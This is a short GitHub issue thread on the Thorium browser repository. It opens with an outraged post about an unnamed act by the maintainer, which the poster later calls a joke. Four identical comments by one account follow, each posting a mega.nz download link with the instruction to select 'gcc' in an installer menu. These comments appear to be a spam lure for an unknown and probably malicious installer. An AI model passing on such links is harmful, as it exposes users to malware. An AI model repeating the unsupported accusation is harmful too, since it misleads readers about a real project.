### ISSUE TITLE
I can't believe Alex did this. I'm disgusted.

### ISSUE THREAD

**Issue by TonicGaro** [Alex313031/thorium#787]
With the current situation going on with Thorium I simply cannot recommend this browser. It's simply absurd what Alex put into his browser. At first I couldn't even believe what I was hearing until I checked the commit history on the Thorium repo. I was appalled at what I was seeing and frankly wanted to vomit. This is honestly such a perfect example of why as content creators we need to be more careful about what we recommend people to use. I can only hope a situation like this never happens again as this was in all honestly, pretty traumatizing.

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by TonicGaro** [comment]
alr joke is over
